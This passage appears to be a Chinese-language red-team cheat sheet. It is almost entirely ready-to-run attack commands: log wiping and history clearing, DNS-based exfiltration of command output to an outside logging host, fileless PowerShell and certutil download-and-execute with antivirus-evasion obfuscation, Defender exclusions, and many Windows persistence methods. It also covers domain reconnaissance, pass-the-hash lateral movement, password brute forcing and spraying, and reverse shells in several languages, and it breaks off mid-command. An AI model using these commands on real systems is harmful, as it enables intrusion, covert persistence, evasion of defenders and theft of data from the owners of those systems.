> /var/log/user.log 1124 | echo > /var/log/wtmp 1125 | echo > /var/log/lastlog 1126 | echo > /var/log/btmp 1127 | echo > /var/run/utmp 1128 | rm ~/./bash_history 1129 | history -c 1130 | ``` 1131 | windows iis日志 1132 | ``` 1133 | C:\inetpub\logs\LogFiles 1134 | ``` 1135 | 1136 | 1137 | ## 开3389 1138 | ``` 1139 | 方法一 1140 | wmic /namespace:\root\cimv2\terminalservices path win32_terminalservicesetting where (__CLASS != "") call setallowtsconnections 1 1141 | wmic /namespace:\root\cimv2\terminalservices path win32_tsgeneralsetting where (TerminalName ='RDP-Tcp') call setuserauthenticationrequired 1 1142 | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fSingleSessionPerUser /t REG_DWORD /d 0 /f 1143 | net start TermService 1144 | 1145 | 方法二 1146 | #设置远程桌面端口 1147 | reg add "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /t REG_DWORD /v portnumber /d 3389 /f 1148 | #开启远程桌面 1149 | wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 1150 | #检查端口状态 1151 | netstat -an|find "3389" 1152 | #关闭远程桌面 1153 | wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 0 1154 | ``` 1155 | 1156 | ## 文件搜索 1157 | https://www.anquanke.com/post/id/245019 1158 | 1159 | ``` 1160 | findstr /s /i /n /d:C:\ /c:"123123" *.txt 1161 | ``` 1162 | 1163 | ``` 1164 | for /r C: %i in (login.*) do @echo %i 1165 | ``` 1166 | 1167 | ``` 1168 | where /R C: login.* 1169 | ``` 1170 | 1171 | ``` 1172 | dir /s/a-d/b login.* 1173 | ``` 1174 | 1175 | ``` 1176 | find / -name index.php 1177 | ``` 1178 | 1179 | ``` 1180 | find / -name index.php 1181 | ``` 1182 | 1183 | ``` 1184 | find / -name "index.php" | xargs grep "111222" 1185 | ``` 1186 | 1187 | ``` 1188 | updatedb && locate index.php 1189 | ``` 1190 | 1191 | 1192 | ``` 1193 | 进程路径 1194 | wmic process get name,executablepath 1195 | ``` 1196 | ## 命令执行无回显外带oob 1197 | #### Windows 1198 | 在windows当中，%cd% 代表的是当前目录，我们通过echo将当前目录写入文本temp,然后荣国certutil对文件内容进行base64编码，再过滤certutil携带的字符，将它赋给一个变量，最后通过nslookup外带出来，从而实现获取当前目录的目的。 1199 | ``` 1200 | echo %cd% > temp&&certutil -encode temp temp1&&findstr /L /V "CERTIFICATE" temp1 > temp2&&set /p ADDR=>text3.txt) 1205 | ``` 1206 | 为什么在上面需要过滤=，主要是因为在执行ping命令的时候是不允许带=号的，相较于nslookup，ping命令成功率相对较高，但如果路径过长，可能会导致失败。具体多长需要大家自行试验。 1207 | ``` 1208 | echo %cd% > temp&&certutil -encode temp temp1&&findstr /L /V "CERTIFICATE" temp1 > temp2&&for /f "delims=^= tokens=1,*" %i in (temp2) do (echo %i>>temp3)&&set /p ADDR= test && certutil -encodehex -f test test.hex 4 && powershell $text=Get-Content test.hex;$sub=$text -replace(' ','');$j=11111;foreach($i in $sub){ $fin=$j.tostring()+'.'+$i+'.is1lv6.ceye.io';$j += 1; nslookup $fin } 1213 | ``` 1214 | win常用变量 1215 | ``` 1216 | //变量类型描述 1217 | //%ALLUSERSPROFILE% 本地返回“所有用户”配置文件的位置。 1218 | //%APPDATA% 本地返回默认情况下应用程序存储数据的位置。 1219 | //%CD% 本地返回当前目录字符串。 1220 | //%CMDCMDLINE% 本地返回用来启动当前的 Cmd.exe 的准确命令行。 1221 | //%CMDEXTVERSION% 系统返回当前的“命令处理程序扩展”的版本号。 1222 | //%COMPUTERNAME% 系统返回计算机的名称。 1223 | //%COMSPEC% 系统返回命令行解释器可执行程序的准确路径。 1224 | //%DATE% 系统返回当前日期。使用与 date /t 命令相同的格式。由 Cmd.exe 生成。有关 date 命令的详细信息，请参阅 Date。 1225 | //%ERRORLEVEL% 系统返回上一条命令的错误代码。通常用非零值表示错误。 1226 | //%HOMEDRIVE% 系统返回连接到用户主目录的本地工作站驱动器号。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。 1227 | //%HOMEPATH% 系统返回用户主目录的完整路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。 1228 | //%HOMESHARE% 系统返回用户的共享主目录的网络路径。基于主目录值而设置。用户主目录是在“本地用户和组”中指定的。 1229 | //%LOGONSERVER% 本地返回验证当前登录会话的域控制器的名称。 1230 | //%NUMBER_OF_PROCESSORS% 系统指定安装在计算机上的处理器的数目。 1231 | //%OS% 系统返回操作系统名称。Windows 2000 显示其操作系统为 Windows_NT。 1232 | //%PATH% 系统指定可执行文件的搜索路径。 1233 | //%PATHEXT% 系统返回操作系统认为可执行的文件扩展名的列表。 1234 | //%PROCESSOR_ARCHITECTURE% 系统返回处理器的芯片体系结构。值：x86 或 IA64（基于 Itanium）。 1235 | //%PROCESSOR_IDENTFIER% 系统返回处理器说明。 1236 | //%PROCESSOR_LEVEL% 系统返回计算机上安装的处理器的型号。 1237 | //%PROCESSOR_REVISION% 系统返回处理器的版本号。 1238 | //%P ROMPT% 本地返回当前解释程序的命令提示符设置。由 Cmd.exe 生成。 1239 | //%RANDOM% 系统返回 0 到 32767 之间的任意十进制数字。由 Cmd.exe 生成。 1240 | //%SYSTEMDRIVE% 系统返回包含 Windows server operating system 根目录（即系统根目录）的驱动器。 1241 | //%SYSTEMROOT% 系统返回 Windows server operating system 根目录的位置。 1242 | //%TEMP%和%TMP% 系统和用户返回对当前登录用户可用的应用程序所使用的默认临时目录。有些应用程序需要 TEMP，而其他应用程序则需要 TMP。 1243 | //%TIME% 系统返回当前时间。使用与time /t命令相同的格式。由Cmd.exe生成。有关time命令的详细信息，请参阅 Time。 1244 | //%USERDOMAIN% 本地返回包含用户帐户的域的名称。 1245 | //%USERNAME% 本地返回当前登录的用户的名称。 1246 | //%USERPROFILE% 本地返回当前用户的配置文件的位置。 1247 | //%WINDIR% 系统返回操作系统目录的位置。 1248 | ``` 1249 | #### Linux 1250 | 在linux中pwd也是查看当前目录的，我们通过tr -d将换行符去掉并通过xxd -ps将值转化为16进制，这样我们即可外带出自己想要的东西。 1251 | ``` 1252 | ping pwd|tr -d '\n'|xxd -ps.is1lv6.ceye.io 1253 | ``` 1254 | base64原理和上面类似，主要是对值进行base64编码，然后替换掉“=”，即可成功外带数据。 1255 | ``` 1256 | pingpwd|base64|tr -d ‘=’.is1lv6.ceye.io 1257 | ``` 1258 | 如果有多行数据需要外带，那么请考虑下面的语句。 1259 | ``` 1260 | var=11111 && for b in $(find / -name "index.php" | xargs grep "111222"|xxd -p); do var=$((var+1)) && dig $var.$b.is1lv6.ceye.io; done 1261 | ``` 1262 | 1263 | ## windows短文件名 1264 | 短文件名查看 1265 | ``` 1266 | 用"dir /x"命令可以方便地帮助您查看系统对目录或文件名的缩写 1267 | ``` 1268 | 常见短文件名 1269 | ``` 1270 | 1271 | Documents and Settings 1272 | 可表示为 1273 | DOCUME~1 1274 | 又如： 1275 | Local Settings 1276 | 可表示为 1277 | LOCALS~1 1278 | 1279 | Program Files 1280 | Program Files (x86) 1281 | 这两个目录分别表示为： 1282 | PROGRA~1 1283 | PROGRA~2 1284 | ``` 1285 | 1286 | ## 无文件落地 1287 | powershell不落地文件执行 1288 | ``` 1289 | powershell -c "Invoke-Expression (New-Object Net.WebClient).DownloadString("http://xxx.xx.xx.xx/test.ps1")" 1290 | 1291 | powershell -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://baidu.com/test.ps1'))" 1292 | 1293 | powershell -ExecutionPolicy Bypass -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://baidu.com/test.ps1'))" 1294 | 1295 | echo IEX(New-Object Net.WebClient).DownloadString("http://10.10.14.13:8000/rev.ps1") | powershell -noprofile 1296 | ``` 1297 | 1298 | ## Defender排除项 1299 | Defender排除项 1300 | ``` 1301 | powershell -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath "C:\test" 1302 | ``` 1303 | 1304 | 1305 | ## powershell文件下载 1306 | 1307 | ``` 1308 | powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/1.exe','C:\test\1.exe');start-process 'C:\test\1.exe' 1309 | ``` 1310 | 常用 1311 | ``` 1312 | powershell (new-object System.Net.WebClient).DownloadFile('http://192.168.1.1/1.exe','1.exe') 1313 | ``` 1314 | 1315 | bypass下载 1316 | 1317 | ``` 1318 | echo (new-object System.Net.WebClient).DownloadFile('http://192.168.31.93:8000/tomcat.exe','C:/Users/test/cc.exe')| powershell - 1319 | ``` 1320 | 1321 | ## powershell执行脚本 1322 | base64编码(和其他base64不同，解不开) 1323 | ``` 1324 | $Text = "(new-object System.Net.WebClient).DownloadFile('http://xxxxxxxxxx:8000/bddch.txt','bdchd.txt')" 1325 | $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text) 1326 | $EncodedText =[Convert]::ToBase64String($Bytes) 1327 | $EncodedText 1328 | ``` 1329 | 快速生成,每条命令用;隔开 1330 | ``` 1331 | //加密echo 1 1332 | powershell -Command "$Text = 'echo 1'; $Bytes = [System.Text.Encoding]::Unicode.GetBytes($Text); $EncodedText = [Convert]::ToBase64String($Bytes); $EncodedText" 1333 | ``` 1334 | 1335 | 1336 | base64解码 1337 | ``` 1338 | $EncodedText = "dwByAGkAxxxxxxxxxxxxxxxxxxxAG0AbgB0AG4AJwA=" 1339 | $DecodedText = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($EncodedText)) 1340 | $DecodedText 1341 | 1342 | ``` 1343 | 1344 | 1345 | 运行上面base64编码后的命令，编码后的命令，执行火绒会拦截。 1346 | ``` 1347 | powershell -ExecutionPolicy Bypass -nop -w hidden -sta -enc ZQBjAGgAbwAgADEA 1348 | ``` 1349 | 1350 | 不编码执行 1351 | ``` 1352 | powershell -noP -sta -Command "echo 1" 1353 | 1354 | 下面路径必须用/ 1355 | powershell -noP -sta -Command "echo '1'>d:/21fsd.txt" 1356 | 1357 | 绕过执行 1358 | echo|echo|@powershell -c "1>d:/21fsd.txt"|whoami 1359 | 1360 | 绕过 1361 | echo|echo|@powershell -ExecutionPolicy Bypass -c "1>d:/aaaaaaaa.txt"|whoami 1362 | 1363 | 绕过执行策略 1364 | powershell -ExecutionPolicy Bypass -noP -sta -Command "echo '1'>d:/211fsd.txt" 1365 | ``` 1366 | powershell bypass文章 1367 | https://www.netspi.com/blog/technical-blog/network-pentesting/15-ways-to-bypass-the-powershell-execution-policy/ 1368 | 1369 | 1370 | 1371 | ## certutil.exe下载 1372 | 1373 | ``` 1374 | C:\Windows\System32\certutil.exe C:\Users\Public\cer.exe 1375 | ``` 1376 | 1377 | ``` 1378 | certutil.exe -urlcache -split -f http://192.168.1.1/1.exe 1379 | ``` 1380 | 1381 | ``` 1382 | certutil.exe -urlcache -split -f http://192.168.1.1/1.txt 1.exe 1383 | ``` 1384 | 1385 | ``` 1386 | certutil.exe -urlcache -split -f http://192.168.6.27:8012/download/f.ext C:\windows\temp\up.exe &&start C:\windows\temp\up.exe 1387 | ``` 1388 | 1389 | 删除缓存 1390 | 1391 | ``` 1392 | certutil.exe -urlcache -split -f http://192.168.1.1/1.exe delete 1393 | ``` 1394 | 1395 | 查看缓存项目： 1396 | 1397 | ``` 1398 | certutil.exe -urlcache * 1399 | ``` 1400 | 1401 | 转为base64 1402 | 1403 | ``` 1404 | certutil -encode lcx64.exe lcx64.txt 1405 | ``` 1406 | 1407 | 转回来 1408 | 1409 | ``` 1410 | certutil -decode lcx64.txt lcx64.exe 1411 | ``` 1412 | 1413 | 查看md5 1414 | 1415 | ``` 1416 | certutil -hashfile a.exe MD5 1417 | ``` 1418 | 1419 | bypass 1420 | 1421 | ``` 1422 | Certutil & Certutil –urlcache –f –split url 1423 | Certutil | Certutil –urlcache –f –split url 1424 | ``` 1425 | 1426 | 利用windows的特性，通过" ；@等等符号组合的方式进行混淆执行，发现也能检测到异常行为并拦截。 1427 | ``` 1428 | ;,@certutil&&;,@certutil -u""r""l""c""a""c""h""e"" -split -f http://192.168.xx.xx:7000/test.txt 1429 | 1430 | ;,@certutil -u""r""l""c""a""c""h""e"" -split -f http://192.168.xx.xx:7000/a.exe -DeleteHelloContainer 1431 | 1432 | cer^t^u^til -url""""cache -a -sp""""lit -f http://192.168.xx.xx:8080/xx.txt 1433 | 1434 | certutil -url""""cache -split -f http://192.168.xx.xx:7070/test.txt 1435 | cert^u^t^il -url""""cache -sp""""lit -f http://192.168.xx.xx:7070/test.txt 1436 | ``` 1437 | 1438 | 1439 | 换路径 1440 | ``` 1441 | copy c:\windows\system32\certutil.exe a.exe 1442 | a.exe -urlcache -split -f http://192.168.xx.xx:7000/gdut.txt 1443 | ``` 1444 | 1445 | ## bitsadmin 1446 | 1447 | **不支持https、ftp协议，php python带的服务器会出错** 1448 | 1449 | ``` 1450 | bitsadmin /transfer n http://192.168.1.1/1.exe C:\test\update\1.exe 1451 | ``` 1452 | 1453 | ## wget 下载文件 1454 | 下载到指定目录 1455 | ``` 1456 | wget -P /tmp http://127.0.0.1:8088/aliyun 1457 | ``` 1458 | 1459 | ## curl 下载 1460 | 使用内置option：-o(小写) 1461 | ``` 1462 | curl -o dodo1.jpg http:www.linux.com/dodo1.JPG 1463 | ``` 1464 | 使用内置option：-O（大写) 1465 | ``` 1466 | curl -O http://www.linux.com/dodo1.JPG 1467 | ``` 1468 | 1469 | 下载后，上线 1470 | ``` 1471 | chmod +x /tmp/aliyun&&/tmp/aliyun 1472 | ``` 1473 | 1474 | 1475 | ## windows权限维持 1476 | 1477 | ### Startup目录 1478 | ``` 1479 | NT6以后的目录如下： 1480 | 1481 | 对当前用户有效： 1482 | C:\Users\Username\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup 1483 | 对所有用户有效： 1484 | C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp 1485 | NT6以前的目录如下： 1486 | 1487 | 对当前用户有效： 1488 | C:\Documents and Settings\Hunter\「开始」菜单\程序\启动 1489 | 对所有用户有效： 1490 | C:\Documents and Settings\All Users\「开始」菜单\程序\启动 1491 | 1492 | ``` 1493 | ### 注册键 1494 | 1495 | ``` 1496 | reg add "XXXX" /v evil /t REG_SZ /d "[Absolute Path]\evil.exe" 1497 | ``` 1498 | 1499 | ``` 1500 | 1.Load注册键 1501 | HKEY_CURRENT_USER＼Software＼Microsoft＼Windows NT＼CurrentVersion＼Windows＼load 1502 | 1503 | 2.Userinit注册键 1504 | HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows NT＼CurrentVersion＼Winlogon＼Userinit 1505 | 通常该注册键下面有一个userinit.exe。该键允许指定用逗号分隔的多个程序，如userinit.exe,evil.exe。 1506 | 1507 | 3.Explorer＼Run注册键 1508 | Explorer＼Run键在HKEY_CURRENT_USER和HKEY_LOCAL_MACHINE下都有。 1509 | HKEY_CURRENT_USER＼Software＼Microsoft＼Windows＼CurrentVersion＼Policies＼Explorer＼Run 1510 | HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼Policies＼Explorer＼Run 1511 | Explorer＼Run键在HKEY_CURRENT_USER和HKEY_LOCAL_MACHINE下都有。 1512 | 1513 | 4.RunServicesOnce注册键 1514 | RunServicesOnce注册键用来启动服务程序，启动时间在用户登录之前，而且先于其他通过注册键启动的程序，在HKEY_CURRENT_USER和HKEY_LOCAL_MACHINE下都有。 1515 | HKEY_CURRENT_USER＼Software＼Microsoft＼Windows＼CurrentVersion＼RunServicesOnce 1516 | HKEY_LOCAL_MACHINE＼Software＼Microsoft＼ Windows＼CurrentVersion＼RunServicesOnce 1517 | 1518 | 5.RunServices注册键 1519 | RunServices注册键指定的程序紧接RunServicesOnce指定的程序之后运行，但两者都在用户登录之前。 1520 | HKEY_CURRENT_USER＼Software＼Microsoft＼Windows＼CurrentVersion＼ RunServices 1521 | HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼ CurrentVersion＼RunServices 1522 | 1523 | 6.RunOnce＼Setup注册键 1524 | HKEY_CURRENT_USER＼Software＼Microsoft＼Windows＼CurrentVersion＼RunOnce＼Setup 1525 | HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼RunOnce＼Setup 1526 | 1527 | 7.RunOnce注册键 1528 | 安装程序通常用RunOnce键自动运行程序，它的位置在 1529 | HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼RunOnce 1530 | [小于NT6]HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼RunOnceEx 1531 | HKEY_CURRENT_USER＼Software＼Microsoft＼Windows＼CurrentVersion＼RunOnce 1532 | HKEY_LOCAL_MACHINE下面的RunOnce键会在用户登录之后立即运行程序，运行时机在其他Run键指定的程序之前；HKEY_CURRENT_USER下面的RunOnce键在操作系统处理其他Run键以及“启动”文件夹的内容之后运行。 1533 | 1534 | 8.Run注册键 1535 | HKEY_CURRENT_USER＼Software＼Microsoft＼Windows＼CurrentVersion＼Run 1536 | HKEY_LOCAL_MACHINE＼Software＼Microsoft＼Windows＼CurrentVersion＼Run 1537 | Run是自动运行程序最常用的注册键，HKEY_CURRENT_USER下面的Run键紧接HKEY_LOCAL_MACHINE下面的Run键运行，但两者都在处理“启动”文件夹之前。 1538 | ``` 1539 | 1540 | ### 服务 1541 | ``` 1542 | sc create evil binpath= "cmd.exe /k [Absolute Path]evil.exe" start= "auto" obj= "LocalSystem" 1543 | ``` 1544 | 1545 | ### 计划任务 1546 | 1547 | ``` 1548 | SCHTASKS /Create /RU SYSTEM /SC ONSTART /RL HIGHEST /TN \Microsoft\Windows\evil\eviltask /TR C:\Users\hunter\Desktop\evil.exe 1549 | ``` 1550 | 1551 | ### WMI事件 1552 | 1553 | ``` 1554 | wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="evil", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System' AND TargetInstance.SystemUpTime >= 240 AND TargetInstance.SystemUpTime < 310" 1555 | 1556 | wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="evilConsumer", ExecutablePath="C:\Users\hunter\Desktop\beacon.exe",CommandLineTemplate="C:\Users\hunter\Desktop\beacon.exe" 1557 | 1558 | wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"evil\"", Consumer="CommandLineEventConsumer.Name=\"evilConsumer\"" 1559 | 1560 | ``` 1561 | 1562 | ### 屏幕保护 1563 | 1564 | ``` 1565 | reg add "hkcu\control panel\desktop" /v SCRNSAVE.EXE /d C:\Users\hunter\Desktop\beacon.exe /f 1566 | reg add "hkcu\control panel\desktop" /v ScreenSaveActive /d 1 /f 1567 | reg add "hkcu\control panel\desktop" /v ScreenSaverIsSecure /d 0 /f 1568 | reg add "hkcu\control panel\desktop" /v ScreenSaveTimeOut /d 60 /f 1569 | ``` 1570 | 1571 | ### bitsadmin 1572 | ``` 1573 | bitsadmin /create evil 1574 | bitsadmin /addfile evil "C:\Users\hunter\Desktop\beacon.exe" "C:\Users\hunter\Desktop\beacon.exe" 1575 | bitsadmin.exe /SetNotifyCmdLine evil "C:\Users\hunter\Desktop\beacon.exe" NUL 1576 | bitsadmin /Resume evil 1577 | ``` 1578 | 1579 | ### Netsh白加黑 1580 | 1581 | ``` 1582 | 可以通过导入helperdll的方式做权限维持，命令格式如下： 1583 | netsh add helper [Absolute evil DLL path] 1584 | 但是由于netsh并不会开启自启动，因此还要再写一条自启动项： 1585 | reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run" /v Pentestlab /t REG_SZ /d "cmd /c C:\Windows\System32\netsh" 1586 | 重新启动后依然可获得shell： 1587 | ``` 1588 | 1589 | ### MSDTC 1590 | 1591 | 在默认的Windows安装中，System32文件夹中缺少oci.dll这个文件，在获得写权限的情况下可以在该文件夹下写入一个同名的dll，服务启动时执行恶意代码。 1592 | 默认情况下，由于启动类型设置为“手动”，通过以下命令设置自启： 1593 | ``` 1594 | sc qc msdtc 1595 | sc config msdtc start= auto 1596 | 1597 | ``` 1598 | 1599 | 1600 | ## windows信息收集常用命令 1601 | ``` 1602 | Systeminfo 计算机详细信息(补丁信息) 1603 | 1604 | Net start 所启动的服务 1605 | 1606 | Wmic service list brief 查询本机服务信息 1607 | 1608 | Tasklist 进程列表 1609 | 1610 | Wmic startup get command,caption 查看启动该程序信息 1611 | 1612 | Schtasks /query /fo LIST /v计划任务 1613 | 1614 | Netstat -ano 根据本机端口开放情况来判断有什么服务、其角色 1615 | 1616 | Query user || qwinsta 查看当前在线用户 1617 | 1618 | Net session 列出会话 1619 | 1620 | Net share 查看本机的共享列表 1621 | 1622 | Wmic share get name,path,status 查看共享列表 1623 | 1624 | Net user 本地用户 1625 | 1626 | Net user kkkk 查看本地用户信息 1627 | 1628 | 1629 | Net localgroup 本地用户组 1630 | 1631 | Net localgroup /domain 域用户组 1632 | 1633 | Net localgroup adminnstrators 本地管理员组成员 1634 | 1635 | net localgroup adminstrators /domain 查看登陆过主机的管理员 1636 | 1637 | Wmic useraccount get /all 获取域内用户详细信息 1638 | 1639 | dsquery user 查看存在的用户 1640 | 1641 | Net user /domain 域用户信息 1642 | 1643 | Net user kkkk /domain 域用户kkkk信息 1644 | 1645 | Net user kent password /add /domain添加域用户 1646 | 1647 | 1648 | Net group /domain 域用户组信息 1649 | 1650 | Net view /domain 查询域 1651 | 1652 | Net view /domain:test 查询域内计算机 1653 | 1654 | Net accounts /domain 查询域中密码策略 1655 | 1656 | Net group /domain 查看域内所有用户组 1657 | 1658 | Net group "Domain Controllers" /domain 查看域控制器组 1659 | 1660 | Net group "Domain computers" /domain 查看域内所有计算机列表 1661 | 1662 | Net group "Domain admins" /domain 查看域内管理员用户 1663 | 1664 | Net user /domain kent active:yes 启用域账户 1665 | 1666 | Net user /domain kent active:no 禁用域账户 1667 | 1668 | Nltest /DCLIST:test 查看域中域控制器名 1669 | 1670 | Wmic useraccount get /all 用户详细信息 1671 | 1672 | Net group "Domain Admins" /domain 对应组下的账户信息 1673 | 1674 | nltest /domain_trusts 获取域信任信息 1675 | 1676 | net config workstation 了解本机的配置信息 1677 | 1678 | Netsh firewall show config 查看防火墙配置 1679 | 1680 | Netsh advfirewall set allprofiles state off关闭防火墙(windows server 2003后) 1681 | 1682 | Netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C:\nc.exe" 允许指定程序进入(windows server 2003后) 1683 | 1684 | Netsh advfirewall firewall add rule name="allow nc" dir=out action=allow program="C:\nc.exe"允许指定程序退出(windows server 2003后) 1685 | 1686 | Netsh advfirewall firewall add rule name="Remote Desktop" protocol=TCP dir=in localport=3389 action=allow 允许3389连接(windows server 2003后) 1687 | 1688 | Reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"查看端口代理配置信息 1689 | 1690 | Reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /V PortNumber 查看远程桌面端口号 1691 | 1692 | ``` 1693 | 1694 | ## at&schtasks&sc横向 1695 | 1696 | 使用明文密码登录到目标，需要445和139端口开启： 1697 | ``` 1698 | net use \\192.168.2.148\ipc$ password /user:test\administrator 1699 | 1700 | net use \\192.168.2.148\ipc$ password /user:administrator 1701 | 1702 | 复制文件 1703 | copy c:\1.exe \\192.168.2.148\c$ 1704 | 1705 | at新建10:10分运行的定时作业 1706 | at \\192.168.2.148 10:10 c:\1.exe 1707 | 1708 | Windows server 2012及以上使用schtasks命令 1709 | Schtasks /create /s 192.168.2.148 /ru “SYSTEM” /tn executefile /sc DAILY /tr c:/1.exe /F 1710 | Schtasks /run /s 192.168.2.148 /tn executefile /i 1711 | Schtasks /delete /s 192.168.2.148 /tn executefile /f 1712 | 1713 | sc \\192.168.210.107 create hacker binpath="c:\shell1.exe" #创建服务 1714 | sc \\192.168.210.107 start hacker #启动hacker服务 1715 | ``` 1716 | 1717 | ## impacket包横向命令 1718 | 1719 | 下载https://github.com/maaaaz/impacket-examples-windows 1720 | https://github.com/ropnop/impacket_static_binaries/releases 1721 | Atexec 1722 | ``` 1723 | 需要445端口开启 1724 | Atexec.exe hacker/administrator:abc123@192.168.202.148 "whoami" 1725 | 1726 | Atexec.exe -hashes :fac5d668099409cb6fa223a32ea493b6 hacker/administrator@192.168.202.148 "whoami" 1727 | ``` 1728 | 1729 | 1730 | dcomexec 1731 | ``` 1732 | 需要135端口开启 1733 | dcomexec.exe hacker/administrator:abc123@192.168.202.148 "whoami" 1734 | 1735 | dcomexec.exe -hashes :fac5d668099409cb6fa223a32ea493b6 hacker/administrator@192.168.202.148 "whoami" 1736 | ``` 1737 | 1738 | psexec 1739 | ``` 1740 | 官方Psexec第一种利用方法：可以先有ipc链接，再用psexec运行相应的程序： 1741 | Net use \192.168.202.148\ipc$ zxcvbnm123 /user:test\Administrator 1742 | Psexec \192.168.202.148 -accepteula -s cmd 1743 | 1744 | 官方Psexec第二种利用方法：不用建立ipc连接，直接使用密码或hash进行传递 1745 | Psexec \192.168.202.148 -u Administrator -p zxcvbnm123 -s cmd 1746 | 1747 | PsExec -hashes :fac5d668099409cb6fa223a32ea493b6 test.com/Administrator@192.168.202.148 "whoami" (官方提供的exe执行不了) 1748 | ``` 1749 | 1750 | smbexec 1751 | ``` 1752 | 需要445端口开启 1753 | Smbexec test/Administrator:zxcvbnm123@192.168.202.148 1754 | Smbexec -hashes :fac5d668099409cb6fa223a32ea493b6 test/Administrator@192.168.202.148 1755 | ``` 1756 | 1757 | wmi 1758 | ``` 1759 | WMI利用135端口，支持明文和hash两种方式进行身份验证，且系统日志不记录。 1760 | 第一种：使用系统自带的WMIC明文传递执行相应命令，但执行的结果不回显（先管理员账户登录） 1761 | Wmic /node:192.168.202.148 /user:Administrator /password:zxcvbnm123 process call create "cmd.exe /c ipconfig >C:/1.txt" 1762 | 1763 | 第二种：使用系统自带cscript明文传递执行反弹shell，执行结果有回显，现已被杀 1764 | Cscript //nologo wmiexec.vbs /shell 192.168.202.148 Administrator zxcvbnm123 1765 | 1766 | 第三种：使用第三方impacket套件中的Wmiexec进行明文或hash传递，执行结果有回显 1767 | Wmiexec test/Administrator:zxcvbnm123@192.168.202.148 "whoami" 1768 | Wmiexec -hashes :fac5d668099409cb6fa223a32ea493b6 test/Administrator@192.168.202.148 "whoami" 1769 | 1770 | ``` 1771 | 1772 | 批量操作,需要保存为bat执行 1773 | ``` 1774 | 用已知密码和用户，批量连接ip: 1775 | FOR /F %%i in (ips.txt) do net use \%%i\ipc$ “password” /user:hacker\administrator 1776 | 1777 | 已知用户和ip，批量连接密码(爆破密码)： 1778 | FOR /F %%i in (pass.txt) do net use \192.168.202.148\ipc$ "%%i" /user:test\administrator 1779 | 1780 | 已知用户和ip，批量连接hash(爆破hash)： 1781 | FOR /F %%i in (hash.txt) do atexec.exe -hashes :"%%i" test/administrator@192.168.202.148 "whoami" 1782 | ``` 1783 | 精准批量法 1784 | ``` 1785 | shell for /l %i in (1,1,253) do echo 172.22.13.%i >>tip.txt 1786 | shell for /f %i in (tip.txt) do ping -n 1 -w 10 %i | find /i "ttl" >nul && echo %%i >>ok.tx 1787 | shell for /f %i in (ok.txt) do dir \\%i\c$\users >>result.txt 1788 | ``` 1789 | 1790 | cme 批量 1791 | ``` 1792 | proxychains4 ./cme smb 10.0.0.1/24 -u administrator -H 31d6cfe0d16ae931b73c59d7e0c089c0 -d xx.org -x "net user" 1793 | ``` 1794 | 1795 | 单独执行命令 1796 | ``` 1797 | crackmapexec smb 192.168.10.11 -u Administrator -p 'P@ssw0rd' -x whoami 1798 | ``` 1799 | ldap喷洒 1800 | ``` 1801 | cme ldap 10.11.12.211 -u 'username' -p 'password' --kdcHost 10.11.12.211 --users 1802 | ``` 1803 | 1804 | 1805 | ## 反弹shell(流量太敏感，尽量加密用) 1806 | 1807 | ## nc 1808 | 1809 | ``` 1810 | nc -lvvp 4444 1811 | ``` 1812 | 1813 | ## bash 1814 | 1815 | ``` 1816 | bash -i >& /dev/tcp/172.16.1.130/4444 0>&1 1817 | exec 5<>/dev/tcp/172.16.1.130/4444;cat <&5|while read line;do $line >&5 2>&1;done 1818 | ``` 1819 | 1820 | ## perl 1821 | 1822 | ``` 1823 | perl -e 'use Socket;$i="10.0.0.1";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' 1824 | ``` 1825 | 1826 | ## python 1827 | 1828 | ``` 1829 | python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.31.41",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' 1830 | ``` 1831 | 1832 | ## php 1833 | 1834 | ``` 1835 | php -r '$sock=fsockopen("10.0.0.1",1234);exec("/bin/sh -i <&3 >&3 2>&3");' 1836 | ``` 1837 | 1838 | ## ruby 1839 | 1840 | ``` 1841 | ruby -rsocket -e'f=TCPSocket.open("10.0.0.1",1234).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)' 1842 | ``` 1843 | 1844 | ## nc 1845 | 1846 | ``` 1847 | nc -e /bin/sh 10.0.0.1 1234 1848 | rm /tmp/f;mkfifo /tmp/f;cat 